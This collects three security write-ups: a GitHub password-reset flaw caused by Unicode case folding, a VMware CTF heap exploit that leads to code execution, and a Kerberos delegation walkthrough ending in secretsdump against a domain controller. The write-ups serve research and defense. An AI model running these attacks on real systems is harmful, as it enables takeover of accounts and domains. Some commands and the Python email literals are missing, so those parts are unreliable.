Case Study: Exploiting a Business Logic Flaw in GitHub’s Forgot Password Workflow (discovered by John Gracey)

Original text by Chetan Conikee

John Gracey of GetWisdom published a very interesting business logic flaw in GitHub’s reset password workflow on November 28th, 2019. It was acknowledged and fixed by GitHub’s security team. Left unmitigated, this flaw could lead to account takeover (specifically for accounts without 2FA enabled).

From ASCII to Unicode

ASCII (American Standard Code for Information Interchange) became the first widespread encoding scheme. However, it was limited to only 128 character definitions. This was fine for the most common English characters, numbers, and punctuation, but slowly became limiting for the rest of the world.

Naturally, the rest of the world wanted the same encoding scheme for their characters too, which is why the Unicode standard was created. The objective of Unicode was to unify all the different encoding schemes so that confusion between computers could be limited as much as possible.

As John Gracey points out, developers’ understanding of Unicode is often limited to internationalization, so they fail to grok the details associated with Unicode code points and code units. This lack of understanding can lead to an inherent class of vulnerability called a Unicode case mapping collision.

Loosely speaking, a collision occurs when two different characters are uppercased or lowercased into the same character. This effect is found commonly at the boundary between two different protocols, like email and domain names.

~ John Gracey

On November 24th, 2019, GetWisdom published an exhaustive list of case mapping collisions within the English alphabet here. Following that article, John published a detailed case study of the logic flaw here. I’d recommend reading John’s post in detail before you proceed further.

Hacking Unicode Case Mapping Collision

Let us attempt to emulate the business logic workflow associated with the resetPassword functionality:

  1. Attacker enumerates with a Unicode character embedded in the local part of an email address (not the domain part). For example: `jı`
  2. Attacker clicks forgot-password and types the email (for example: `jı`, where `ı` is the Unicode character)
  3. The business logic supporting the forgot-password function receives the attacker controlled email address and case-folds it (toLowerCase) as part of its sanitization practice. This case folding leads to a Unicode case mapping collision which fundamentally transforms the identity into another user’s email address — `jı` with the Unicode `ı` is transformed into the victim’s registered address due to the collision.
  4. Of course, the validation passes, leading to the next step of creating a reset link and dispatching an email to the address specified in the request (which is attacker controlled) and NOT to the email address associated with the registered account (retrieved after validating the identity).

Let us use this sample Spring Boot based application (forked and revised: conikeec/spring-security-registration) with forgot-password functionality that emulates both a best- and worst-case scenario associated with this logic flaw.

Refer to the controller logic supporting password reset here (with all the symptoms that can lead to an exploit):

  1. Attacker enumerates the Forgot Password function in a SaaS service with an embedded Unicode character.
  2. The attacker controlled userEmail parameter is injected into the resetPasswordBad controller routine.
  3. The validation function findUserByEmail accepts the attacker controlled email address, which is transformed (via case folding) and passes the validation condition (if a registered user exists).
  4. An email with the reset password link is now sent to the address specified in the request (which is attacker controlled) and NOT to the email address associated with the registered account (retrieved after validating the identity).

Automated verification of Business Logic flaws in source code

Let’s fire up ShiftLeft’s Ocular query engine and trace through information flows in order to identify all of the missteps leading to this business logic flaw.

git clone

cd spring-security-registration

//compile and create package artifact
mvn -Dmaven.test.skip=true clean package

// Download the trial distribution of Ocular, install it, and thereafter fire up the prompt to commence the investigation



//retrieve controller mapped to resetPassword route
case class RouteMapping(routeName : String, backingController : String)
val attackSurface ="RequestMapping").map(x =>
    RouteMapping(x.start.parameterAssign.value.code.l.head, x.start.method.fullName.l.head))

attackSurface: List[RouteMapping] = List(

At this stage we have extracted the attack surface and identified all controller functions mapped to exposed routes. Let us proceed to next step.

The route of particular interest to us is:

RouteMapping("[\"/user/resetPasswordBad\"]", "org.baeldung.web.controller.RegistrationController.resetPasswordBad:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)")

CONDITION #1: The attacker controlled vector (email) with Unicode in the local part is case folded and then passed to the database validation routine

//define the source function and attacker controlled vector (which is the email address parameter)
val source = cpg.method.fullNameExact("org.baeldung.web.controller.RegistrationController.resetPasswordBad:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)").parameter.evalType("java.lang.String")

// The DB lookup function is a part of the IUserService interface, implemented by UserService here
val DB_LOOKUP_FN_EXPR = ".*findUserByEmail.*"

//define the sink function that participates in the data flow
val sink = cpg.method.fullName(DB_LOOKUP_FN_EXPR).parameter.evalType("java.lang.String")

// Verify BUSINESS LOGIC FLAW check to determine if the attacker controlled vector (email) is case folded prior to the DB lookup

  """ _____________________________________________________________________________________________________________________
 | tracked                | lineNumber| method               | file                                                   |
 | userEmail              | 134       | resetPasswordBad     | org/baeldung/web/controller/|
 | userEmail              | 135       | resetPasswordBad     | org/baeldung/web/controller/|
 | this                   | N/A       | toLowerCase          | java/lang/                                  |
 | ret                    | N/A       | toLowerCase          | java/lang/                                  |
 | userEmail.toLowerCase()| 135       | resetPasswordBad     | org/baeldung/web/controller/|
 | param1                 | N/A       | .assignment| N/A                                                    |
 | param0                 | N/A       | .assignment| N/A                                                    |
 | $r1                    | 135       | resetPasswordBad     | org/baeldung/web/controller/|
 | $r1                    | 135       | resetPasswordBad     | org/baeldung/web/controller/|
 | param0                 | N/A       | findUserByEmail      | org/baeldung/service/                 |

CONDITION #2: If condition #1 passes, a reset token for a registered user is sent to the attacker controlled email (with an embedded Unicode character)

//define the source function and attacker controlled vector (which is the email address parameter)
val source = cpg.method.fullNameExact("org.baeldung.web.controller.RegistrationController.resetPasswordBad:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)").parameter.evalType("java.lang.String")

//define email channel sink function name
val EMAIL_CHANNEL_SINK="org.springframework.mail.javamail.JavaMailSender.send:void(org.springframework.mail.SimpleMailMessage)"

//define the sink function that participates in the data flow
val sink = cpg.method.fullNameExact(EMAIL_CHANNEL_SINK).parameter.evalType("java.lang.String")

// Verify BUSINESS LOGIC FLAW check to determine if the attacker controlled vector (email) is used in the email send function, rather than the registered user’s email (fetched from the DB in step #1)

res58: List[String] = List(
  """ __________________________________________________________________________________________________________________________________________________________________
 | tracked                                                       | lineNumber| method                     | file                                                   |
 | userEmail                                                     | 134       | resetPasswordBad           | org/baeldung/web/controller/|
 | userEmail                                                     | 139       | resetPasswordBad           | org/baeldung/web/controller/|
 | userEmail                                                     | 198       | constructResetTokenEmailBad| org/baeldung/web/controller/|
 | userEmail                                                     | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/|
 | userEmail                                                     | 213       | constructEmailBad          | org/baeldung/web/controller/|
 | userEmail                                                     | 217       | constructEmailBad          | org/baeldung/web/controller/|
 | param0                                                        | N/A       | setTo                      | org/springframework/mail/        |
 | this                                                          | N/A       | setTo                      | org/springframework/mail/        |
 | email                                                         | 217       | constructEmailBad          | org/baeldung/web/controller/|
 | email                                                         | 218       | constructEmailBad          | org/baeldung/web/controller/|
 | this                                                          | N/A       | setFrom                    | org/springframework/mail/        |
 | this                                                          | N/A       | setFrom                    | org/springframework/mail/        |
 | email                                                         | 218       | constructEmailBad          | org/baeldung/web/controller/|
 | email                                                         | 219       | constructEmailBad          | org/baeldung/web/controller/|
 | ret                                                           | 213       | constructEmailBad          | org/baeldung/web/controller/|
 | this.constructEmailBad("Reset Password",$r11,userEmail)       | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/|
 | param1                                                        | N/A       | .assignment      | N/A                                                    |
 | param0                                                        | N/A       | .assignment      | N/A                                                    |
 | $r12                                                          | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/|
 | $r12                                                          | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/|
 | ret                                                           | 198       | constructResetTokenEmailBad| org/baeldung/web/controller/|
 | this.constructResetTokenEmailBad($r9,$r10,token,$l0,userEmail)| 139       | resetPasswordBad           | org/baeldung/web/controller/|
 | param1                                                        | N/A       | .assignment      | N/A                                                    |
 | param0                                                        | N/A       | .assignment      | N/A                                                    |
 | $r12                                                          | 139       | resetPasswordBad           | org/baeldung/web/controller/|
 | $r12                                                          | 139       | resetPasswordBad           | org/baeldung/web/controller/|
 | param0                                                        | N/A       | send                       | org/springframework/mail/javamail/  |

Safe Coding to prevent this business logic flaw

  1. Watch for an anomalous volume of password resets (forgot-password requests) initiated against your application. An attacker is most likely enumerating your endpoint.
  2. Use two-factor authentication (2FA) as part of the validation and reset functions.
  3. As John Gracey suggests, use punycode conversion as part of your registration, validation, and reset functions. Validate both the local and domain parts of email addresses.
  4. Continuously verify your entire fleet of applications in a CI/CD pipeline to ensure that none of the conditions above violate baseline checks in any current and future releases.
  5. Send the password reset email ONLY to the original email address that was used to create the account and NOT to an email address controlled by the attacker.
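Point 5 is the decisive fix. Below is a hedged sketch of a hardened routine combining points 3 and 5, with hypothetical names and a deliberately simplified ASCII-only validation standing in for full punycode handling:

```python
users_by_email = {
    "": {"account": "victim-account", "email": ""},
}
sent_mail = []    # (recipient, body) pairs standing in for an SMTP client

def reset_password_good(user_email: str) -> str:
    # Point 3 (simplified): validate both local and domain parts; here we
    # reject any address that is not pure ASCII before case folding.
    if not user_email.isascii():
        return "invalid email"
    record = users_by_email.get(user_email.lower())
    if record is None:
        return "no such user"
    # Point 5: mail ONLY the address stored on the registered account.
    sent_mail.append((record["email"], f"reset link for {record['account']}"))
    return "reset email sent"

assert reset_password_good("mi" + "\u212A" + "") == "invalid email"
assert reset_password_good("") == "reset email sent"
assert sent_mail[0][0] == ""
```

Note that the ASCII check runs before any normalization: NFKC-normalizing first would quietly map characters like U+212A KELVIN SIGN to ASCII "K" and defeat the check.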

ShiftLeft is an application security platform built over the foundational Code Property Graph that is uniquely positioned to deliver a specification model to query for vulnerable conditions, business logic flaws, and insider attacks that might exist in your application’s codebase.

If you’d like to learn more about ShiftLeft, please request a demo.

Stay Safe!

Pwning VMWare, Part 1: RWCTF 2018 Station-Escape

Original text by nafod

Since December rolled around, I have been working on pwnables related to VMware breakouts as part of my advent calendar for 2019. Advent calendars are a fun way to get motivated to get familiar with a target you’re always putting off, and I had a lot of success learning about V8 with my calendar from last year.

To that end, my calendar this year is lighter on challenges than last year. VMware has been part of significantly fewer CTFs than browsers, and the only recent and interesting challenge I noticed was Station-Escape from Real World CTF Finals 2018. To fill out the rest of the calendar, I picked up two additional bugs used at Pwn2Own this year by the talented Fluoroacetate duo. I plan to write an additional blog post about the exploitation of those challenges once complete, with a broader look at VMware exploitation and attack surface. For now I’ll focus solely on the CTF pwnable and limit my scope to the sections relating to the challenge.

As a final note, I exploited VMware on Ubuntu 18.04, which was the system used by the organizers during RWCTF. On other systems the exploitation could be wildly different and more complicated, due to the change in underlying heap implementation.

The environment (briefly)

I debugged this challenge by using the VMware Workstation bundle inside of another VMware VM. After booting up the victim, I ssh’d into it and then attached to it with gdb in order to debug the vmware-vmx process. The actual guest OS doesn’t matter; in my case, I also used Ubuntu 18.04 simply because I had just downloaded the iso.

Diffing for the bug

The challenge itself is distributed with a VMware bundle file and a specific patched vmx binary. Once we install the bundle and compare the patched vmx to the real one in bindiff, we find just a single code block patched, amounting to a few bytes as a bytepatch.

bindiff graph comparison

And, in the decompiler, with some comments:

v26->state = 1;
v26->virt_time = VmTime_ReadVirtualTime();
sub_1D8D00(0, v5);
v6 = (void (__fastcall *)(__int64, _QWORD, _QWORD))v26->fp_close_backdoor;
v7 = vm_get_user_reg32(3);
v6(v26->field_48, v5, v7 & 0x21);     // guestrpc_close_backdoor
LODWORD(v8) = 0x10000;

Luckily, the changes are very small, amounting to NOPing out a struct-field write and changing the mask applied to a user controlled flag value.

The change itself is to a function responsible for handling VMware GuestRPC, an interface that allows the guest system to interact with the host via string-based requests, like a command interface. Much has been written about GuestRPC before, but briefly, it provides an ASCII interface to hypervisor internals. Most commands are short strings in the form of setters and getters, like tools.capability.dnd_version 3. Internally, the commands are sent over “channels”, of which there can be 8 at a time per guest. The flow of operations in a single request includes:

0. Open channel
1. Send command length
2. Send command data
3. Receive reply size
4. Receive reply data
5. "Finalize" transfer
6. Close channel

As a final note, GuestRPC requests can be sent from guest userspace, so bugs in this interface are particularly interesting from an attacker’s perspective.

The bug

Examining the changes, we find that they’re all in request type 5, corresponding to the “finalize transfer” step. The user controls the flags argument, which is masked with & 0x21 and passed to guestrpc_close_backdoor:
void __fastcall guestrpc_close_backdoor(__int64 a1, unsigned __int16 a2, char a3)
{
  __int64 v3; // rbx
  void *v4; // rdi

  v3 = a1;
  v4 = *(void **)(a1 + 8);        // the reply buffer
  if ( a3 & 0x20 )
  {
    free(v4);                     // newly reachable free of the reply buffer
  }
  else if ( !(a3 & 0x10) )
  {
    sub_176D90(v3, 0);
    if ( *(_BYTE *)(v3 + 0x20) )
    {
      vmx_log("GuestRpc: Closing RPCI backdoor channel %u after send completion\n", a2);
      *(_BYTE *)(v3 + 32) = 0;
    }
  }
}

Control of a3 allows us to go down the first branch in a previously inaccessible manner, letting us free the buffer at a1 + 8, which corresponds to the buffer used internally to store the reply data passed back to the user. However, this same buffer will also be freed by command type 6 (close channel), resulting in a controlled double free which we can turn into a use-after-free. (The other patch NOP’d out the code responsible for NULLing out the reply buffer, which would have prevented this codepath from being exploited.)

Given that the bug is very similar to a traditional CTF heap pwnable, we can already envision a rough path forward, for which we’ll fill in details shortly:

  • Obtain a leak, ideally of the vmx binary text section
  • Use tcache to allocate a chunk on top of a function pointer
  • Obtain PC control and invoke system("/usr/bin/xcalc &")

Heap internals and obtaining a leak

Firstly, it should be stated that the vmx heap appears to have little churn in a mostly idle VM, at least in the heap section used for GuestRPC requests. This means the exploit can be relatively reliable even if the VM has been running for a while or if the user was previously using the system.

In order to obtain a heap leak, we’ll perform the following series of operations:

  1. Allocate three channels [A], [B], and [C]
  2. Send the info-set command to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.
  3. Open channel [B] and issue an info-get to retrieve the data we just set
  4. Issue the reply length and reply read commands on channel [B]
  5. Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
  6. Invoke info-get on channel [C] and receive the reply length, which allocates a buffer at the same address we just freed
  7. Close channel [B], freeing the buffer again
  8. Read out the reply on channel [C] to leak our data


The vmware-vmx process has a number of associated threads, including one thread per guest vCPU. This means that the underlying glibc heap has both the tcache mechanism active, as well as several different heap arenas. Although we can avoid mixing up our tcache chunks by pinning our CPU in the guest to a single core, we still cannot directly leak a libc pointer, because only the main arena resides in libc’s data section. Instead, we can only leak a pointer to our individual thread arena, which is less useful in our case.

[#0] Id 1, Name: "vmware-vmx", stopped, reason: STOPPED
[#1] Id 2, Name: "vmx-vthread-300", stopped, reason: STOPPED
[#2] Id 3, Name: "vmx-vthread-301", stopped, reason: STOPPED
[#3] Id 4, Name: "vmx-mks", stopped, reason: STOPPED
[#4] Id 5, Name: "vmx-svga", stopped, reason: STOPPED
[#5] Id 6, Name: "threaded-ml", stopped, reason: STOPPED
[#6] Id 7, Name: "vmx-vcpu-0", stopped, reason: STOPPED <-- our vCPU thread
[#7] Id 8, Name: "vmx-vcpu-1", stopped, reason: STOPPED
[#8] Id 9, Name: "vmx-vcpu-2", stopped, reason: STOPPED
[#9] Id 10, Name: "vmx-vcpu-3", stopped, reason: STOPPED
[#10] Id 11, Name: "vmx-vthread-353", stopped, reason: STOPPED
. . . .

To get around this, we’ll modify the above flow to spray some other object with a vtable pointer. I came across this writeup by Amat Cama, which detailed his exploitation in 2017 using drag-n-drop and copy-paste structures, which are allocated in the host vCPU heap when you send a GuestRPC command.

Therefore, I updated the above flow as follows to leak out a vtable / vmx-bss pointer:

  1. Allocate four channels [A], [B], [C], and [D]
  2. Send the info-set command to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.
  3. Open channel [B] and issue an info-get to retrieve the data we just set
  4. Issue the reply length and reply read commands on channel [B]
  5. Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
  6. Invoke info-get on channel [C] and receive the reply length, which allocates a buffer at the same address we just freed
  7. Close channel [B], freeing the buffer again
  8. Send a drag-n-drop/copy-paste related command on channel [D], which allocates an object with a vtable on top of the chunk referenced by [C]
  9. Read out the reply on channel [C] to leak the vtable pointer

One thing I did notice is that the copy-paste and drag-n-drop structures appear to only allocate their vtable-containing objects once per guest execution lifetime. This could complicate leaking pointers inside VMs where guest tools are installed and actively being used. In a more reliable exploit, we would hope to create a more repeatable arbitrary read and write primitive, perhaps with these heap constructions alone. From there, we could work backwards to leak our vmx binary.

Overwriting a channel structure

Once we have obtained a vtable leak, we can begin looking for interesting structures in the BSS. The vmx binary has system in its GOT, so we can also jump to the PLT stub as a proxy for system’s address.

I chose to target the underlying channel structures which are created when you open a GuestRPC channel. vmx has an array of 8 of these structures (size 0x60) inside its BSS, with each structure containing several buffer pointers, lengths, and function pointers.

Most notably, this structure matches up favorably to our code above in the request type 5 handler:

// v6 is read from the channel structure...
v6 = (void (__fastcall *)(__int64, _QWORD, _QWORD))v26->fp_close_backdoor;

// . . . .

// ... and so is the first argument
v6(v26->field_48, v5, v7 & 0x21);     // guestrpc_close_backdoor

To target this, we’ll abuse the tcache mechanism in glibc 2.27, the glibc version in use on the host system. In that version of glibc, tcache was completely unprotected, and by overwriting the first quadword of a freed chunk on a tcache freelist, we can allocate a chunk of that size anywhere in memory simply by subsequently allocating that size twice. Therefore, we make our exploit land on top of a channel structure, set bogus fields to control the function pointer and argument, and then invoke the buggy finalize request to call system. The full steps are as follows:

  1. Allocate five channels [A], [B], [C], [D], and [E]
  2. Send the info-set command to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap. This time, populate the value such that its first 8 bytes are a pointer to the channel array in the BSS.
  3. Open channel [B] and issue an info-get to retrieve the data we just set
  4. Issue the reply length and reply read commands on channel [B]
  5. Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
  6. Invoke info-get on channel [C] and receive the reply length, which allocates a buffer at the same address we just freed
  7. Close channel [B], freeing the buffer again
  8. Invoke info-get on channel [D] to flush one chunk from the tcache list; the next chunk will land on our channel
  9. Send a “command” to [E] consisting of fake chunk data padded to our buggy chunk size. This will land on our channel BSS data and give us control over a channel
  10. Invoke the buggy finalize request on our corrupted channel to pop calc


This was definitely a light challenge with which to dip my feet into VMware exploitation. The exploitation itself was pretty vanilla heap, but the overall challenge did involve some RE on the vmx binary, and required becoming familiar with some of the attack surface exposed to the guest. For a CTF challenge, it hit roughly the appropriate intersection of “real world” and “solvable in 48 hours” that you would expect from a high quality event. You can find my final solution script in my advent-vmpwn github repo.

From here on out, my advent calendar involves 2 CVEs, both of which are in virtual hardware devices implemented by the vmx binary. Furthermore, neither has a public PoC nor details on exploitation, so they should be more interesting to dive into. So, stay tuned for my next post if you’re interested in digging into the underpinnings of USB 😉

The Weak Bug — Exploiting a Heap Overflow in VMware

Real World CTF 2018 Finals Station-Escape Writeup (challenge files are linked here!)

No Shells Required — a Walkthrough on Using Impacket and Kerberos to Delegate Your Way to DA

Original text by Red XOR Blue

There are a ton of great resources that have been released in the past few years on a multitude of Kerberos delegation abuse avenues.  However, most of the guidance out there is pretty in-depth and/or focuses on the usage of @Harmj0y’s Rubeus.  While Rubeus is a super well-written tool that can do quite a few things extremely well, in engagements where I’m already running off of a primarily Linux environment, having tools that function on that platform can be beneficial.  To that end, all the functionality we need to perform unconstrained, constrained, and resource-based constrained delegation attacks is already available to us in the impacket suite of tools.
This post will cover how to identify potential delegation attack paths, when you would want to use them, and give detailed walkthroughs of how to perform them on a Linux platform.  What we won’t be covering in this guide is a detailed background of Kerberos authentication, or how various types of delegation work in-depth, as there are some really great articles already out that go into a ton of detail on the inner-workings of the protocol.  If you are interested in a deeper dive, the most comprehensive & enlightening post I’ve read is @Elad_Shamir’s write-up:

Unconstrained Delegation

What Is It?

Back in the early days of Windows Active Directory (pre-Server 2003) this was really the only way to delegate access, which at a high level effectively means configuring a service with privileges to impersonate users elsewhere on the network.  Unconstrained Delegation would be used for something like a front-end web server that needed to take in requests from users, and then impersonate those users to access their data on a second database server.  

Unfortunately, as the name implies, these impersonation rights were not limited to a single system or service; rather, they allowed a configured account to impersonate anyone that authenticated against it, anywhere on the network. This is due to the fact that when an object authenticates to a service tied to an account configured with unconstrained delegation, it sends the remote service a copy of its TGT (Ticket Granting Ticket), which allows the remote system to generate new TGS (Ticket Granting Service / service ticket) requests at will. These TGSs are used for authenticating to Kerberos-enabled services across the network, meaning that if you possess an object’s TGT you can impersonate it anywhere on the network where you can authenticate with Kerberos.
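The danger can be sketched with a toy model (not real Kerberos; all names invented): the unconstrained service caches a copy of every caller’s TGT, and a TGT lets its holder request tickets for any service.

```python
# Toy model of why unconstrained delegation is dangerous.
class KDC:
    def issue_tgs(self, tgt_owner, service):
        # anyone holding a TGT can request a ticket to ANY service
        return f"TGS({tgt_owner} -> {service})"

class UnconstrainedService:
    def __init__(self):
        self.cached_tgts = []

    def authenticate(self, caller):
        # with TRUSTED_FOR_DELEGATION, the caller forwards a copy of its TGT
        self.cached_tgts.append(caller)

kdc = KDC()
svc = UnconstrainedService()
svc.authenticate("DC$")   # e.g. a DC coerced into authenticating to us

# Whoever compromises svc now impersonates DC$ to any Kerberos service:
stolen = svc.cached_tgts[0]
assert kdc.issue_tgs(stolen, "LDAP/dc01") == "TGS(DC$ -> LDAP/dc01)"
```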

When To Use:

If you can gain access to an account (user or computer) that is configured with unconstrained delegation. To identify users & computers configured with unconstrained delegation I use pywerview, a python port of a good chunk of powerview’s functionality, but feel free to use whatever tool works best for you. It has handy flags to pull accounts configured with both constrained and unconstrained delegation. In this case what we’re really looking for is any user or computer with a UserAccountControl attribute that includes ‘TRUSTED_FOR_DELEGATION’. All we’ll need at this point is a set of AD creds to allow us to do the enumeration. Taking a look at the output of the check we ran below, we can see that the user ‘unconstrained’ is configured with unconstrained delegation:

If you find you have access to a computer object that is configured with unconstrained delegation, it may be easier simply to perform the print spooler attack and extract the ticket from memory using Rubeus, as detailed here. However, if you have access to a user account configured with delegation, or would prefer to avoid running code on remote systems as much as possible, the following should be helpful.
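Under the hood, tools like pywerview perform a bitwise test on the userAccountControl attribute; TRUSTED_FOR_DELEGATION is bit 0x80000 (524288). The standalone check below shows the bit logic plus the kind of LDAP bitwise filter such tools issue (flag values from Microsoft’s documentation; the filter string is illustrative):

```python
# userAccountControl flags relevant to delegation (values per MSDN).
TRUSTED_FOR_DELEGATION         = 0x00080000  # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000  # constrained w/ protocol transition

def is_unconstrained(uac: int) -> bool:
    return bool(uac & TRUSTED_FOR_DELEGATION)

# LDAP bitwise-AND matching rule filter for unconstrained-delegation accounts:
UNCONSTRAINED_FILTER = "(userAccountControl:1.2.840.113556.1.4.803:=524288)"

# e.g. a NORMAL_ACCOUNT (0x200) with TRUSTED_FOR_DELEGATION set:
assert is_unconstrained(0x200 | 0x80000)
assert not is_unconstrained(0x200)
assert 0x80000 == 524288   # the decimal value used inside the LDAP filter
```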

Process Walkthrough:

Note: This section is pretty much a direct walkthrough of the awesome work @_dirkjan wrote up in his blog. If you’re familiar with this style of attack it’s nothing new, just a (hopefully) fairly straightforward walkthrough of the path that I’ve had the most success with on engagements after identifying unconstrained delegation.
If we do end up identifying any user accounts configured with unconstrained delegation, we’ll want to obtain Kerberos tickets we can attempt to crack.  For an account to be configured with delegation, it also needs to be configured with an SPN (Service Principal Name).  This means that we should be able to retrieve a crackable Kerberos ticket for the account using impacket’s DOMAIN/USER:PASSWORD -request-user UNCONSTRAINED_USER

Assuming we’re able to recover the password for the account (or used another method to get admin access on a computer configured with unconstrained delegation), we can now move on to attempting to leverage this access to get DA on the network.  We’ll start by attempting to add an SPN to the account we have access to. This is the only part of the attack that requires non-default settings to be configured (for a user account), but judging by all the SQL devs on Stack Exchange asking how to enable it, it seems to be something that is commonly turned on already.  If we have access to a computer account configured with unconstrained delegation, we can use the ‘Validated write to DNS host name’ security attribute (configured by default) to add an additional hostname to the object, which will automatically configure new SPNs that will also be configured with unconstrained delegation. We then just have to create a new DNS record to point that new hostname at us.
We’ll be using dirk-jan’s krbrelayx toolkit for the rest of this process, first using to attempt to add a ‘host’ SPN for a nonexistent system on the network.  Note: it is important to ensure that when you’re adding an SPN you use the FQDN of the network, not just the hostname.  You’ll see one of two messages, based on whether your account has privileges to modify its own SPNs (above = an account with the appropriate attributes set, below = attribute not set). -u DOMAIN\\USER -p PASSWORD -s host/FAKESYSTEM.FQDN ldap://DC.FQDN

If you don’t have privileges, this is pretty much the end of this potential vector, although I would still recommend targeting the systems(s) on which the account has SPN’s configured for, as they likely have TGT’s in-memory.
However, if we are able to successfully add an SPN for a non-existent system, we can keep going.  Next, we’ll add a DNS record for this same non-existent system that points back to our system’s IP, effectively turning our system into this non-existent system.  Due to the actions we took in the last step (creating an SPN for the ‘host’ service, tied to our unconstrained-delegation user, on this non-existent hostname that now points to our system), we are basically creating a new ‘computer’ on the network that has unconstrained delegation configured on its ‘host’ service.
We’ll be using another part of the krbrelayx toolkit to complete this step: create a new DNS record and point it at the IP of our attack box (Note: DNS records take ~3 minutes to update, so don’t worry if you complete this step and can’t immediately ping / nslookup your new host):

-u DOMAIN\\USERNAME -p PASSWORD -r FAKESYSTEM.FQDN -a add -d YOUR_IP DC_HOSTNAME

Everything should be ready to go now; we’ll execute the print spooler bug to force the DC$ account to attempt to authenticate to the host service of our new ‘computer’ that is configured with unconstrained delegation.  This will in turn cause the DC to provide a copy of its TGT when authenticating, which we can then use to impersonate it against any other Kerberos-enabled service.  In one window we’ll set up as follows. **This is very important:** the krbsalt is the FQDN of the domain in ALL CAPS, followed immediately by the username (case-sensitive).  The krbpass is the user’s password, nothing crazy there.

--krbsalt DOMAIN.FQDNUsernameCaseSensitive --krbpass PASSWORD
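The salt construction above is easy to get wrong, so here is a tiny Python helper that encodes exactly the rule described (the function name is mine):

```python
def krb_salt(domain_fqdn: str, username: str) -> str:
    """The AES Kerberos salt for a user account, per the rule above:
    the domain FQDN in ALL CAPS followed immediately by the
    case-sensitive username."""
    return domain_fqdn.upper() + username

# e.g. for the httpDelegUser account in testlab.local:
print(krb_salt("testlab.local", "httpDelegUser"))  # TESTLAB.LOCALhttpDelegUser
```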

Once you have that running in one window, we’ll use the final tool within the krbrelayx toolkit to kick off the attack (Note: the user used to kick off the attack doesn’t matter; it can be any domain user).  The below shows what a successful attack looks like:

DOMAIN/USERNAME:PASSWORD@DC_HOSTNAME FAKE_SYSTEM.FQDN

On our krbrelayx window, we should see that we have gotten an inbound connection and have obtained a TGT (saved as a .ccache file) for the DC$ account:

At this point, we just need to export the ticket we received into memory, after which we should be able to run secretsdump against the DC:

export KRB5CCNAME=CCACHE_FILE.CCACHE

-k DC_Hostname -just-dc

Constrained Delegation

What Is It?

Microsoft’s next iteration of delegation included the ability to limit where objects had delegation (impersonation) rights to.  Now a front-end web server that needed to impersonate users to access their data on a database could be restricted; allowing it to only impersonate users on a specific service & system.  However, as we will find out, the portion of the ticket that limits access to a certain service is not encrypted.  This gives us some room to gain additional access to systems if we gain access to an object configured with these rights.

When To Use:

If you can gain access to an account (user or computer) that is configured with constrained delegation.  You can find these by searching for the ‘TRUSTED_TO_AUTH_FOR_DELEGATION’ value in the userAccountControl attribute of AD objects.  This can also be found through the use of Pywerview, as outlined in the section above.
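If you have already dumped userAccountControl values (with Pywerview or plain LDAP), the flag check is just a bit test; the constants below are the documented Microsoft values:

```python
# userAccountControl bit flags (documented Microsoft values)
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation w/ protocol transition

def delegation_flags(uac: int) -> dict:
    """Decode the delegation-related bits of a userAccountControl value."""
    return {
        "unconstrained": bool(uac & TRUSTED_FOR_DELEGATION),
        "constrained_t2a4d": bool(uac & TRUSTED_TO_AUTH_FOR_DELEGATION),
    }

# A normal enabled user (0x200) with TRUSTED_TO_AUTH_FOR_DELEGATION set:
print(delegation_flags(0x200 | TRUSTED_TO_AUTH_FOR_DELEGATION))
```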

Process Walkthrough:

This time, we’ll start by targeting another account, httpDelegUser.  As we can see from our initial enumeration with Pywerview, this account has the ‘TRUSTED_TO_AUTH_FOR_DELEGATION’ flag set.  We can also check the contents of the account’s msDS-AllowedToDelegateTo attribute to determine that it has delegation privileges to the www service on Server02.  Not the worst thing in the world, but probably not going to get us a remote shell.

Also a quick recap of the account’s group memberships:

To start this attack, we’ll use another impacket tool to retrieve a ticket for an impersonated user to the service we have delegation rights to (the www service on server02 in this case).  In this example we’ll impersonate ‘bob’, a domain admin in this environment.  Note: if a user is marked as ‘Account is sensitive and cannot be delegated’ in AD, you will not be able to impersonate them.

-spn SERVICE/HOSTNAME_YOU_HAVE_DELEGATION_RIGHTS_TO.FQDN -impersonate TARGET_USER DOMAIN/USERNAME:PASSWORD

From here, the initial assumption would be that we could only authenticate against the www service on server02 with this ticket.  However, Alberto Solino discovered that the service name portion of the ticket (sname) is not actually a protected part of the ticket.  This allows us to change the sname to any value we want, as long as it’s another service running under the same account as the original one we have delegation rights to.  For example, if our account (httpDelegUser) has delegation rights to a service that the server02 computer object is running (example SPN: www/server02), we can change our sname to any other SPN associated with server02 (ex. cifs/server02).  His blog post on the mechanism by which this occurs is super insightful and worth a read:
Even better for us, as Alberto Solino is one of the primary writers of impacket, he built this logic in so that these sname conversions happen automatically for us on the back-end:

From an operational standpoint, this means the ticket for the www service we obtained in the step above can be loaded into memory and used with just about any of the impacket suite of tools to run commands, dump SAM, etc.

Resource-Based Constrained Delegation

What Is It?

Note: Microsoft is releasing an update in January 2020 that will enable LDAP channel binding & LDAP signing by default on Windows systems, remediating this potential attack vector on fully patched systems. 

Starting with Windows Server 2012, objects in AD could set their own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, effectively allowing objects to set what remote objects had rights to delegate to them.  This allows those remote objects with delegation rights to impersonate any account in AD to any service on the local system.  Therefore, if we can convince a remote system to add an object that we control to their msDS-AllowedToActOnBehalfOfOtherIdentity attribute, we can use it to impersonate any other user not marked as ‘Account is sensitive and cannot be delegated’ on it.

When To Use:

Basically, when you’re on a network and want to get a shell on a different system on that same network segment.  This attack can be run without needing any prior credentials, as described by @_dirkjan in his blog.  However, the method described does require that a domain controller in the environment is configured with LDAPS, which seems to be somewhat uncommon based on the environments I’ve tested against over the past 6 months.

